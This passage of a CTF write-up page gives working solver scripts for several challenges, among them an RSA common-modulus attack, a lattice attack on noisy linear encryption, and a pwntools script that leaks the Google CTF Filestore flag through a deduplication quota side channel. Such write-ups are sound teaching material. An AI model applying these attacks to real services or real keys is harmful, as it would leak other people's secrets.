[81, 49, 31, 73, 55, 79, 14, 29, 93, 71, 40, 67, 53, 88, 30, 3, 49, 13, 36, 65],
[52, 70, 95, 23, 4, 60, 11, 42, 69, 24, 68, 56, 1, 32, 56, 71, 37, 2, 36, 91],
[22, 31, 16, 71, 51, 67, 63, 89, 41, 92, 36, 54, 22, 40, 40, 28, 66, 33, 13, 80],
[24, 47, 32, 60, 99, 3, 45, 2, 44, 75, 33, 53, 78, 36, 84, 20, 35, 17, 12, 50],
[32, 98, 81, 28, 64, 23, 67, 10, 26, 38, 40, 67, 59, 54, 70, 66, 18, 38, 64, 70],
[67, 26, 20, 68, 2, 62, 12, 20, 95, 63, 94, 39, 63, 8, 40, 91, 66, 49, 94, 21],
[24, 55, 58, 5, 66, 73, 99, 26, 97, 17, 78, 78, 96, 83, 14, 88, 34, 89, 63, 72],
[21, 36, 23, 9, 75, 0, 76, 44, 20, 45, 35, 14, 0, 61, 33, 97, 34, 31, 33, 95],
[78, 17, 53, 28, 22, 75, 31, 67, 15, 94, 3, 80, 4, 62, 16, 14, 9, 53, 56, 92],
[16, 39, 5, 42, 96, 35, 31, 47, 55, 58, 88, 24, 0, 17, 54, 24, 36, 29, 85, 57],
[86, 56, 0, 48, 35, 71, 89, 7, 5, 44, 44, 37, 44, 60, 21, 58, 51, 54, 17, 58],
[19, 8, 81, 68, 5, 94, 47, 69, 28, 73, 92, 13, 86, 52, 17, 77, 4, 89, 55, 40],
[4, 52, 8, 83, 97, 35, 99, 16, 7, 97, 57, 32, 16, 26, 26, 79, 33, 27, 98, 66],
[88, 36, 68, 87, 57, 62, 20, 72, 3, 46, 33, 67, 46, 55, 12, 32, 63, 93, 53, 69],
[4, 42, 16, 73, 38, 25, 39, 11, 24, 94, 72, 18, 8, 46, 29, 32, 40, 62, 76, 36],
[20, 69, 36, 41, 72, 30, 23, 88, 34, 62, 99, 69, 82, 67, 59, 85, 74, 4, 36, 16],
[20, 73, 35, 29, 78, 31, 90, 1, 74, 31, 49, 71, 48, 86, 81, 16, 23, 57, 5, 54],
[1, 70, 54, 71, 83, 51, 54, 69, 16, 92, 33, 48, 61, 43, 52, 1, 89, 19, 67, 48]]
# Products of four adjacent entries of the 20x20 grid `a`, one list per direction:
# along rows, along columns, down-right diagonals, up-right diagonals.
row_products = []
column_products = []
for j in range(20):
    for i in range(17):
        row_products.append(a[j][i] * a[j][i+1] * a[j][i+2] * a[j][i+3])
        column_products.append(a[i][j] * a[i+1][j] * a[i+2][j] * a[i+3][j])
diagonal_products = [
    a[i][j] * a[i+1][j+1] * a[i+2][j+2] * a[i+3][j+3]
    for i in range(17) for j in range(17)
]
antidiagonal_products = [
    a[i+3][j] * a[i+2][j+1] * a[i+1][j+2] * a[i][j+3]
    for i in range(17) for j in range(17)
]
aa = [row_products, column_products, diagonal_products, antidiagonal_products]
# Largest product in each direction
for products in aa:
    print(max(products))
<h2 id="ezflow"><a class="header" href="#ezflow">ezflow</a></h2>
<pre><code class="language-sh">#open in wireshark
#export the zip file from the pcap
#find the zip password in the pcap data: filter for the SQL timeout (time-based) injection requests
#unzip the file with that password to get the flag
</code></pre>
<p>task.py</p>
<pre><code class="language-python">from Crypto.Util.number import *
from flag import *
# Textbook RSA: the flag is turned into one integer and encrypted with no padding.
m = bytes_to_long(flag)
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
# The same message is encrypted twice under ONE modulus with two different public exponents.
e1 = 65537
e2 = 992923
# NOTE(review): e1 and e2 are coprime, so anyone holding both ciphertexts can
# recover m without factoring n (common-modulus weakness). Mitigation: never
# share a modulus between key pairs, and use randomized padding such as RSA-OAEP
# so that two encryptions of one message are unrelated.
c1 = pow(m,e1,n)
c2 = pow(m,e2,n)
# Ciphertexts published with the challenge:
#c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
#c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">#give e1,e2,c1,c2,n
#find m
import gmpy2
from Crypto.Util.number import long_to_bytes,bytes_to_long
# Public values from task.py: one modulus, two exponents, two ciphertexts of the same m.
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923
c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117
# Extended Euclid: gcdext returns (g, r, s) with r*e1 + s*e2 == g. The exponents
# are coprime, so g is 1 and c1**r * c2**s == m**(r*e1 + s*e2) == m (mod n).
g, r, s = gmpy2.gcdext(e1, e2)
# One of r and s is negative; gmpy2.powmod handles a negative exponent through
# the modular inverse of the base.
left = gmpy2.powmod(c1, r, n)
right = gmpy2.powmod(c2, s, n)
m = (left * right) % n
print(long_to_bytes(m))
</code></pre>
<h2 id="checkin"><a class="header" href="#checkin">checkin</a></h2>
<pre><code class="language-sh">#GY3DMYZWGE3DON3CGQZTGNZUGY2WMNJXGZTDOMRTGE3DINLGGQ4TGNJVMY2TGMZQGVTDINRXGU3GKNTFG44TKZRUHA3GMNZQGMZTKZRVHEZTANZVGVTDIYZWHE3GENRVGVTDGMJXGQ3WI
open CyberChef and let it auto-decode the string
</code></pre>
<h2 id="capture-radiate-chart"><a class="header" href="#capture-radiate-chart">Capture Radiate Chart</a></h2>
<p>get_rar.py</p>
<pre><code class="language-python">data = open('alien.png','rb').read()
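# Collect one byte per IDAT chunk tag and save the result as a string of hex digits.
flag = ''
# Skip past the first IDAT tag; the scan below starts after it.
pos = data.index(b'IDAT')
data = data[pos+5:]
while True:
    try:
        pos = data.index(b'IDAT')
        # The byte five positions before the tag, as two lowercase hex digits.
        flag += format(data[pos-5], '02x')
    except (ValueError, IndexError):
        # bytes.index raises ValueError once no IDAT tag is left. Leave the
        # loop here: without a break the handler would run forever.
        break
    data = data[pos+5:]
# NOTE: out.rar receives hex digits as text, not raw archive bytes; convert them
# (for example with bytes.fromhex) before treating the file as an archive.
with open('out.rar', 'w') as f1:
    f1.write(flag)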
</code></pre>
<h2 id="iloveyou"><a class="header" href="#iloveyou">ILOVEYOU</a></h2>
<p><img src="../../img_list/image20230604014025638.png" alt="image-20230604014025638" /></p>
<pre><code class="language-sh"># open http://www.cmd5.com/ decode find flag
</code></pre>
<h2 id="bobs-enc"><a class="header" href="#bobs-enc">bobs enc</a></h2>
<p>task.py</p>
<pre><code class="language-python">from secret import *
import random
# Python 2 script: uses the print statement and slices the list returned by map().
prime = 2141  # modulus used by add() and multi()
print len(flag)
# Flag characters as integers, split after the first 21.
flag = map(ord,flag)
flag1 = flag[:21]
flag2 = flag[21:]
row = 64  # number of key rows, hence of values in each ciphertext
def add(msg1,msg2):
    """Add two integer sequences element-wise modulo ``prime``.

    Pairs come from zip, so the result is as long as the shorter input.
    """
    total = []
    for left, right in zip(msg1, msg2):
        total.append((left + right) % prime)
    return total
def multi(msg1,msg2):
    """Multiply the matrix ``msg1`` (a list of rows) by the vector ``msg2`` modulo ``prime``.

    Each row is paired with ``msg2`` by zip, so extra entries on either side are ignored.
    Returns one reduced dot product per row.
    """
    products = []
    for coeffs in msg1:
        acc = 0
        for coeff, value in zip(coeffs, msg2):
            # Reduce after every term so the accumulator stays below prime.
            acc = (acc + coeff * value) % prime
        products.append(acc)
    return products
def genkey(leng):
    """Build a matrix with ``row`` rows and ``leng`` columns of random integers in [0, 511].

    NOTE(review): the values come from the ``random`` module, which is not a
    cryptographically secure generator.
    """
    matrix_rows = []
    for _unused in range(row):
        current = []
        for _col in range(leng):
            current.append(random.randint(0,511))
        matrix_rows.append(current)
    return matrix_rows
# The key matrix is generated once, printed in full, and reused for both halves.
key = genkey(len(flag1))
print key
# First half: the exact matrix-vector product is printed, with no noise added.
cipher1 = multi(key,flag1)
print cipher1
# Second half: same key, but an error in [0, 6] is added to every value before printing.
cipher2 = multi(key,flag2)
noise = [random.randint(0,6) for i in range(row)]
print add(noise,cipher2)
# NOTE(review): with the matrix published, cipher1 is a plain linear system mod
# prime and gives no confidentiality. The noisy half depends entirely on its
# parameters (at most 21 unknowns, modulus 2141, error at most 6); these look far
# smaller than noise-based schemes need - check them against current guidance.
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from sage.all import *
from sage.modules.free_module_integer import IntegerLattice
from random import randint
import sys
from itertools import starmap
from operator import mul
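import ast  # local import: literal_eval replaces eval() on the challenge output

# 'out' holds the printed key and the two ciphertexts, one per line
# (presumably the task output without its leading length line - verify).
with open('out', 'r') as f:
    # The file is produced by someone else's program, so parse it as data only:
    # literal_eval accepts list and number literals and rejects any other
    # expression, whereas eval() would execute whatever the file contains.
    key = ast.literal_eval(f.readline())
    c1 = ast.literal_eval(f.readline())
    c2 = ast.literal_eval(f.readline())
prime = 2141
# First half: the first 21 key rows and outputs form a square system mod prime,
# solved by inverting the matrix.
K = matrix(Zmod(prime), key[:21])
C1 = vector(Zmod(prime), c1[:21])
m1 = K.inverse() * C1
flag = ''
for i in m1:
    flag += chr(i)
print(flag)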
# Babai's Nearest Plane algorithm
def Babai_closest_vector(M, G, target):
    """Approximate the lattice vector closest to ``target``.

    M is the basis (one vector per row) and G the matching Gram-Schmidt
    vectors; both are indexed by row. Returns ``target`` minus the remainder
    left after the reduction passes below.
    """
    # NOTE(review): `small` starts as the same object as `target`; the final
    # subtraction only makes sense if `-=` yields a new vector - confirm.
    small = target
    # Five passes over the basis, last row first.
    for _ in range(5):
        for i in reversed(range(M.nrows())):
            # Rounded projection coefficient of the remainder onto G[i].
            c = ((small * G[i]) / (G[i] * G[i])).round()
            # Remove that many copies of basis row i from the remainder.
            small -= M[i] * c
    return target - small
# Dimensions: m = 64 outputs (key rows), n = 21 unknowns, q = the modulus.
m = 64
n = 21
q = prime
A_values = key
b_values = c2
# (m+n) x m integer matrix whose rows generate the lattice:
#   rows 0 .. m-1   : q on the diagonal,
#   rows m .. m+n-1 : the key matrix transposed (one row per unknown).
A = matrix(ZZ, m + n, m)
for i in range(m):
    A[i, i] = q
for x in range(m):
    for y in range(n):
        A[m + y, x] = A_values[x][y]
lattice = IntegerLattice(A, lll_reduce=True)
# print("LLL done")
gram = lattice.reduced_basis.gram_schmidt()[0]
# The noisy ciphertext is the target; the nearest lattice vector is taken as
# the ciphertext with the noise removed.
target = vector(ZZ, b_values)
res = Babai_closest_vector(lattice.reduced_basis, gram, target)
# print("Closest Vector: {}".format(res))
R = IntegerModRing(q)
M = Matrix(R, A_values)
# Solve key * x = res over the integers mod q for the unknown characters.
ingredients = M.solve_right(res)
# print("Ingredients: {}".format(ingredients))
# Append the second half to the first half recovered earlier.
for i in ingredients:
    flag += chr(i)
print(flag)
</code></pre>
<pre><code class="language-sh">#get flag
sage exp.py
</code></pre>
<h2 id="babyqmk"><a class="header" href="#babyqmk">babyqmk</a></h2>
<pre><code class="language-python">SEED = 0
# Keycodes at the ends of the letter range (A..Z) and the digit range (1..9, then 0).
KC_A, KC_Z = 4, 29
KC_1, KC_9, KC_0 = 30, 38, 39
def rand():
    """Advance the global linear congruential state and return a 15-bit value.

    State update: SEED = 214013 * SEED + 2531011, with no truncation applied.
    Result: bits 16 to 30 of the new state.
    """
    global SEED
    state = 214013 * SEED + 2531011
    SEED = state
    # Floor-divide by 2**16, then keep the low 15 bits (value mod 2**15).
    return (state // 65536) % 32768
keycodeToKey = {0:'KC_NO', 1:'KC_TRANSPARENT', 2:'KC_POST_FAIL', 3:'KC_UNDEFINED',
4:'KC_A', 5:'KC_B', 6:'KC_C', 7:'KC_D', 8:'KC_E', 9:'KC_F', 10:'KC_G', 11:'KC_H',
12:'KC_I', 13:'KC_J', 14:'KC_K', 15:'KC_L', 16:'KC_M', 17:'KC_N', 18:'KC_O', 19:'KC_P',
20:'KC_Q', 21:'KC_R', 22:'KC_S', 23:'KC_T', 24:'KC_U', 25:'KC_V', 26:'KC_W', 27:'KC_X',
28:'KC_Y', 29:'KC_Z', 30:'KC_1', 31:'KC_2', 32:'KC_3', 33:'KC_4', 34:'KC_5', 35:'KC_6',
36:'KC_7', 37:'KC_8', 38:'KC_9', 39:'KC_0', 40:'KC_ENTER', 41:'KC_ESCAPE',
42:'KC_BACKSPACE', 43:'KC_TAB', 44:'KC_SPACE', 45:'KC_MINUS', 46:'KC_EQUAL',
47:'KC_LEFT_BRACKET', 48:'KC_RIGHT_BRACKET', 49:'KC_BACKSLASH', 50:'KC_NONUS_HASH',
51:'KC_SEMICOLON', 52:'KC_QUOTE', 53:'KC_GRAVE', 54:'KC_COMMA', 55:'KC_DOT',
56:'KC_SLASH', 57:'KC_CAPS_LOCK', 58:'KC_F1', 59:'KC_F2', 60:'KC_F3', 61:'KC_F4',
62:'KC_F5', 63:'KC_F6', 64:'KC_F7', 65:'KC_F8', 66:'KC_F9', 67:'KC_F10', 68:'KC_F11',
69:'KC_F12', 70:'KC_PRINT_SCREEN', 71:'KC_SCROLL_LOCK', 72:'KC_PAUSE', 73:'KC_INSERT',
74:'KC_HOME', 75:'KC_PAGE_UP', 76:'KC_DELETE', 77:'KC_END', 78:'KC_PAGE_DOWN',
79:'KC_RIGHT', 80:'KC_LEFT', 81:'KC_DOWN', 82:'KC_UP', 83:'KC_NUM_LOCK',
84:'KC_KP_SLASH', 85:'KC_KP_ASTERISK', 86:'KC_KP_MINUS', 87:'KC_KP_PLUS',
88:'KC_KP_ENTER', 89:'KC_KP_1', 90:'KC_KP_2', 91:'KC_KP_3', 92:'KC_KP_4', 93:'KC_KP_5',
94:'KC_KP_6', 95:'KC_KP_7', 96:'KC_KP_8', 97:'KC_KP_9', 98:'KC_KP_0', 99:'KC_KP_DOT',
100:'KC_NONUS_BACKSLASH', 101:'KC_APPLICATION', 102:'KC_KB_POWER', 103:'KC_KP_EQUAL',
104:'KC_F13', 105:'KC_F14', 106:'KC_F15', 107:'KC_F16', 108:'KC_F17', 109:'KC_F18',
110:'KC_F19', 111:'KC_F20', 112:'KC_F21', 113:'KC_F22', 114:'KC_F23', 115:'KC_F24',
116:'KC_EXECUTE', 117:'KC_HELP', 118:'KC_MENU', 119:'KC_SELECT', 120:'KC_STOP',
121:'KC_AGAIN', 122:'KC_UNDO', 123:'KC_CUT', 124:'KC_COPY', 125:'KC_PASTE',
126:'KC_FIND', 127:'KC_KB_MUTE', 128:'KC_KB_VOLUME_UP', 129:'KC_KB_VOLUME_DOWN',
130:'KC_LOCKING_CAPS_LOCK', 131:'KC_LOCKING_NUM_LOCK', 132:'KC_LOCKING_SCROLL_LOCK',
133:'KC_KP_COMMA', 134:'KC_KP_EQUAL_AS400', 135:'KC_INTERNATIONAL_1',
136:'KC_INTERNATIONAL_2', 137:'KC_INTERNATIONAL_3', 138:'KC_INTERNATIONAL_4',
139:'KC_INTERNATIONAL_5', 140:'KC_INTERNATIONAL_6', 141:'KC_INTERNATIONAL_7',
142:'KC_INTERNATIONAL_8', 143:'KC_INTERNATIONAL_9', 144:'KC_LANGUAGE_1',
145:'KC_LANGUAGE_2', 146:'KC_LANGUAGE_3', 147:'KC_LANGUAGE_4', 148:'KC_LANGUAGE_5',
149:'KC_LANGUAGE_6', 150:'KC_LANGUAGE_7', 151:'KC_LANGUAGE_8', 152:'KC_LANGUAGE_9',
153:'KC_ALTERNATE_ERASE', 154:'KC_SYSTEM_REQUEST', 155:'KC_CANCEL', 156:'KC_CLEAR',
157:'KC_PRIOR', 158:'KC_RETURN', 159:'KC_SEPARATOR', 160:'KC_OUT', 161:'KC_OPER',
162:'KC_CLEAR_AGAIN', 163:'KC_CRSEL', 164:'KC_EXSEL', 224:'KC_LEFT_CTRL',
225:'KC_LEFT_SHIFT', 226:'KC_LEFT_ALT', 227:'KC_LEFT_GUI', 228:'KC_RIGHT_CTRL',
229:'KC_RIGHT_SHIFT', 230:'KC_RIGHT_ALT', 231:'KC_RIGHT_GUI'}
keymaps = [0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x001E, 0x001F, 0x0020, 0x0021, 0x0022,
0x0023, 0x0024, 0x0025, 0x0026, 0x0027, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0014, 0x001A,
0x0008, 0x0015, 0x0017, 0x001C, 0x0018, 0x000C, 0x0012, 0x0013,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0004, 0x0016, 0x0007, 0x0009, 0x000A, 0x000B, 0x000D, 0x000E,
0x000F, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x001D, 0x001B, 0x0006, 0x0019, 0x0005, 0x0011,
0x0010, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F, 0x0029, 0x0000, 0x003A, 0x003B,
0x003C, 0x003D, 0x0000, 0x003E, 0x003F, 0x0040, 0x0041, 0x0042,
0x0043, 0x0044, 0x0045, 0x0046, 0x0047, 0x0048, 0x0035, 0x0012,
0x0013, 0x000D, 0x0020, 0x001B, 0x0016, 0x000E, 0x0005, 0x0011,
0x001A, 0x002D, 0x002E, 0x002A, 0x0000, 0x0049, 0x004A, 0x004B,
0x002B, 0x0000, 0x0015, 0x000A, 0x0027, 0x0022, 0x0009, 0x0018,
0x0024, 0x0023, 0x0017, 0x0006, 0x002F, 0x0030, 0x0031, 0x004C,
0x004D, 0x004E, 0x0039, 0x0000, 0x0007, 0x0004, 0x0010, 0x000C,
0x0019, 0x0008, 0x001C, 0x0014, 0x000F, 0x0033, 0x0034, 0x0028,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x00E1, 0x001F, 0x000B,
0x001E, 0x0025, 0x001D, 0x0026, 0x0021, 0x0036, 0x0037, 0x0038,
0x0000, 0x00E5, 0x0000, 0x0000, 0x0052, 0x0000, 0x00E0, 0x00E3,
0x0000, 0x00E2, 0x0000, 0x0000, 0x002C, 0x0000, 0x0000, 0x0000,
0x00E6, 0x00E7, 0x0000, 0x0065, 0x00E4, 0x0050, 0x0051, 0x004F,
0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001,
0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0025, 0x0004,
0x0023, 0x0015, 0x0008, 0x001D, 0x0019, 0x001F, 0x0006, 0x0027,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0010, 0x0007, 0x000F, 0x0009, 0x0021, 0x0022, 0x001E, 0x0026,
0x000B, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x0018, 0x001C, 0x0024, 0x0014, 0x0017, 0x000C,
0x000A, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F]
# One translation table per layer index (0, 1, 2); filled by buildLayerMap.
LayerMap = [{} for _ in range(3)]
def buildLayerMap(layer):
    """Fill ``LayerMap[layer]`` with a map from this layer's key names to layer-0 key names.

    Every layer occupies 108 consecutive entries of ``keymaps``. A keycode of 1
    (KC_TRANSPARENT) is replaced by the entry at the same position one layer below.
    """
    base = layer * 108
    for pos in range(108):
        code = keymaps[base + pos]
        if code == 1:  # KC_TRANSPARENT
            code = keymaps[base - 108 + pos]
        layer0_name = keycodeToKey[keymaps[pos]]
        LayerMap[layer][keycodeToKey[code]] = layer0_name
def formatLayer():
    """Print the three layers as grids of key names.

    Each layer is printed as 6 lines of 18 names, every name left-justified to
    15 characters and followed by a comma, with a blank line after the layer.
    """
    for layer in range(3):
        layer_start = layer * 108
        for col in range(6):
            line_start = layer_start + col * 18
            for row in range(18):
                name = keycodeToKey[keymaps[line_start + row]]
                print(name.ljust(15), end=',')
            print()
        print()
# NOTE(review): the nesting below is reconstructed from a flattened listing;
# confirm it against the original script.
# Print the three layers, then build the layer-1 and layer-2 translation tables.
formatLayer()
buildLayerMap(1)
buildLayerMap(2)
# Replace the generator state with rand()'s first return value.
SEED = rand()
# NOTE(review): `sum` shadows the builtin of the same name for the rest of the script.
sum = 0
enc = "1CTED8IL-BIMM-SMFP-HOKP-HOIDRZL4W6KR"
Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
flag=""
for i in range(36):
    # One generator step per character; its result is discarded.
    rand()
    # Characters 0-17 use layer 1, characters 18-35 use layer 2.
    Layer_stat = (i // 18) + 1
    if enc[i] in Table:
        if Layer_stat == 1:
            # Layer 1: subtract a generator-derived offset, adding 36 when the result falls below KC_A.
            keycode = Table.index(enc[i]) - (rand() % 36)
            if keycode &lt; KC_A:
                keycode += 36
            sum += keycode
        else:
            # Layer 2: add an offset taken from the running sum, subtracting 36 when the result exceeds KC_0.
            keycode = Table.index(enc[i]) + (sum % 40)
            if keycode &gt; KC_0:
                keycode -= 36
            sum += keycode
        # Translate through the layer table and drop the three-character "KC_" prefix.
        flag += LayerMap[ Layer_stat ][ keycodeToKey[keycode] ][3:]
    else:
        # Characters that are not in Table (the '-' separators) are copied unchanged.
        flag += enc[i]
print("flag{" + flag + "}")
</code></pre>
<h2 id="01世界"><a class="header" href="#01世界">01世界</a></h2>
<pre><code class="language-sh">stegsolve 01.png
#click left color map get qrcode
#decode qrcode get flag
</code></pre>
<h2 id="base"><a class="header" href="#base">Base</a></h2>
<pre><code class="language-sh">#give 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d
ctf-party 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d from_hex
#get
13+5=???----zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7===
#the tail looks a lot like Base64; "13+5" suggests ROT13+ROT5, and decoding that way gives
mzwgcz33hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh2===
Following the challenge title, Base32-decoding this gives flag{9e6ef1a3f5f0e31cadd29c297bef5ad2}
</code></pre>
<p>exp.rb</p>
<pre><code class="language-ruby">require 'ctf_party'
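# The tail looks a lot like Base64; "13+5" suggests ROT13 for the letters plus ROT5 for the digits.
s = "zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7==="
r13 = s.rot(shift: 13)
p r13 # mzwgcz88hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh7===
# rot leaves the digits untouched (see the output above), and rotating the
# letters by 5 is not ROT5. ROT5 moves every digit forward by 5 modulo 10.
r13_5 = r13.tr('0-9', '5-90-4')
p r13_5 # mzwgcz33hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh2===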
</code></pre>
<h2 id="filestoregoogle_ctf"><a class="header" href="#filestoregoogle_ctf">Filestore(Google_CTF)</a></h2>
<p>task.py</p>
<pre><code class="language-python">import os, secrets, string, time
# from flag import flag
# Local stand-in for the real flag, which the challenge imports (line above).
flag = "flag{1ww717-nxnxksn-xsnjxsnxjs}"
def main():
    """Run one interactive session of the line-based file store (load / store / status / exit)."""
    # It's a tiny server...
    # One 64 KiB buffer holds the bytes of every stored file, the flag included.
    blob = bytearray(2**16)
    files = {}
    used = 0
    # Use deduplication to save space.
    # NOTE(review): deduplication runs over the whole blob, so it also matches
    # bytes of the flag stored at startup, and `status` reports `used`. Whether a
    # store consumed space therefore tells a client if its bytes were already
    # present. Mitigations: deduplicate only within one owner's data, keep
    # secrets out of the shared pool, or stop reporting shared usage.
    def store(data):
        """Store ``data`` as a list of (offset, length) parts and return a new random file id."""
        nonlocal used
        MINIMUM_BLOCK = 16
        MAXIMUM_BLOCK = 1024
        part_list = []
        while data:
            # Search the blob for every occurrence of the next (up to) 16 bytes
            # and keep the one sharing the longest prefix, capped at 1024 bytes.
            prefix = data[:MINIMUM_BLOCK]
            ind = -1
            bestlen, bestind = 0, -1
            while True:
                ind = blob.find(prefix, ind+1)
                if ind == -1: break
                length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
                if length &gt; bestlen:
                    bestlen, bestind = length, ind
            if bestind != -1:
                # Match found: reference the existing bytes; `used` does not change.
                part, data = data[:bestlen], data[bestlen:]
                part_list.append((bestind, bestlen))
            else:
                # No match: append one block of new bytes and grow `used`.
                part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
                blob[used:used+len(part)] = part
                part_list.append((used, len(part)))
                used += len(part)
                assert used &lt;= len(blob)
        # File ids are 16 random alphanumeric characters from the secrets module.
        fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
        files[fid] = part_list
        return fid
    def load(fid):
        """Reassemble a file from its parts; an unknown id raises KeyError."""
        data = []
        for ind, length in files[fid]:
            data.append(blob[ind:ind+length])
        return b"".join(data)
    print("Welcome to our file storage solution.")
    # Store the flag as one of the files.
    # The returned file id is discarded, so the flag cannot be loaded by id.
    store(bytes(flag, "utf-8"))
    while True:
        print()
        print("Menu:")
        print("- load")
        print("- store")
        print("- status")
        print("- exit")
        choice = input().strip().lower()
        if choice == "load":
            print("Send me the file id...")
            fid = input().strip()
            data = load(fid)
            print(data.decode())
        elif choice == "store":
            print("Send me a line of data...")
            data = input().strip()
            fid = store(bytes(data, "utf-8"))
            print("Stored! Here's your file id:")
            print(fid)
        elif choice == "status":
            print("User: ctfplayer")
            print("Time: %s" % time.asctime())
            # Usage of the shared blob, printed to three decimals of a kB.
            kb = used / 1024.0
            kb_all = len(blob) / 1024.0
            print("Quota: %0.3fkB/%0.3fkB" % (kb, kb_all))
            print("Files: %d" % len(files))
        elif choice == "exit":
            break
        else:
            # Any other input ends the session.
            print("Nope.")
            break
# Any exception escaping main() (for example the KeyError raised by load for an
# unknown file id) is reported only as a generic message.
try:
    main()
except Exception:
    print("Nope.")
# Pause for one second before the process exits.
time.sleep(1)
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from pwn import *
local = True
debug = False


def _open_tube():
    """Start the local task.py or connect to the remote service, per ``local`` and ``debug``."""
    extra = {'level': 'debug'} if debug else {}
    if local:
        return process(["python3", "task.py"], **extra)
    return remote("filestore.2021.ctfcompetition.com", 1337, **extra)


def _read_quota(tube):
    """Request the status page and return the raw text that follows "Quota: "."""
    tube.sendline(b"status")
    tube.recvuntil(b"Quota: ")
    return tube.recvline(keepends=False)


r = _open_tube()
possible_chars = list(map(chr, range(33, 127)))
FLAG = "flag{"
r.recvuntil(b"- exit\n")
for _ in range(30):
    try:
        for char in possible_chars:
            current_quota = _read_quota(r)
            r.sendline(b"store")
            r.sendline(FLAG[-15:] + char)
            new_quota = _read_quota(r)
            # An unchanged quota means the service deduplicated the stored bytes,
            # i.e. they were already present in its buffer.
            if new_quota == current_quota:
                FLAG += char
                print(FLAG)
                break
    except EOFError:
        # The session ended; open a fresh one and continue with the next round.
        r = _open_tube()
</code></pre>
</main>
</div>
</div>
</div>
<script>
window.playground_line_numbers = true;
</script>
<script>
window.playground_copyable = true;
</script>
<script src="../../ace.js"></script>
<script src="../../editor.js"></script>
<script src="../../mode-rust.js"></script>
<script src="../../theme-dawn.js"></script>
<script src="../../theme-tomorrow_night.js"></script>
<script src="../../elasticlunr.min.js"></script>
<script src="../../mark.min.js"></script>
<script src="../../searcher.js"></script>
<script src="../../clipboard.min.js"></script>
<script src="../../highlight.js"></script>
<script src="../../book.js"></script>
<!-- Custom JS scripts -->
<script src="../../src/js/custom.js"></script>
</div>
</body>
</html>